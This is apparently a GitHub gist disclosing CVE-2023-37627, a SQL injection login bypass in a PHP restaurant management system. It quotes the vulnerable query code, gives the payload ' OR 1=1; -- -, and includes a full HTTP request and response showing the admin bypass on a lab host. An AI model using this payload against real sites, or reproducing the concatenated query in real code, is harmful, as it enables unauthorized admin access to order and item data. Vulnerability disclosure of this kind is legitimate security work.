Skip to content

Instantly share code, notes, and snippets.

@1337kid

1337kid/CVE-2023-37627_PoC.md

Created July 12, 2023 01:30
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save 1337kid/d3e7702bd19cc9355a6b3f153eb2fe8e to your computer and use it in GitHub Desktop.
Save 1337kid/d3e7702bd19cc9355a6b3f153eb2fe8e to your computer and use it in GitHub Desktop.
Download ZIP
PoC for CVE-2023-37627
Raw
CVE-2023-37627_PoC.md

CVE-2023-37627

Product : Online Restaurant Management System - 1.0
Vulnerability Type : SQL Injection
Vendor of Product : code-projects

Desc : An attacker can bypass the admin panel and view order records, add items, delete items etc.

Vulnerable Code

// file : index.php
...
$email=$_POST['email'];
$password=$_POST['password'];


$sql = "SELECT * FROM admin WHERE email='$email' AND password='$password'";

$query  = $pdoconn->prepare($sql);
$query->execute();
$arr_login=$query->fetchAll(PDO::FETCH_ASSOC);
...

POC

Admin login panel can be bypassed by giving the "password" or "username" as ' OR 1=1; -- -.

SELECT * FROM admin WHERE email='vulnweb@pwned.tld' AND password='' or 1=1; -- - '

Email validation is preset in the frontend. It can be bypassed either by disabling javascript or by directly sending a POST request to admin/login-admin.php

SELECT * FROM admin WHERE email='' or 1=1; -- -' AND password='vulnweb'
-- Injecting email field

When logging with the password ' OR 1=1; -- - , we get a 302 redirect to "dashboard.php", indicating that we have bypassed the admin login.

Request

POST /RestroGirls/admin/login-admin.php HTTP/1.1
Host: 192.168.56.101
Content-Length: 45
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.56.101
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.56.101/RestroGirls/admin/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=fngds5pmj5jnvtbref6qqoskuk
Connection: close

email=vulnweb%40pwned.tld&password=%27+or+1%3D1%3B+--+-

Response

HTTP/1.1 302 Found
Date: Wed, 12 Jul 2023 01:04:04 GMT
Server: Apache/2.4.55 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: dashboard.php
Content-Length: 4
Connection: close
Content-Type: text/html; charset=UTF-8
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment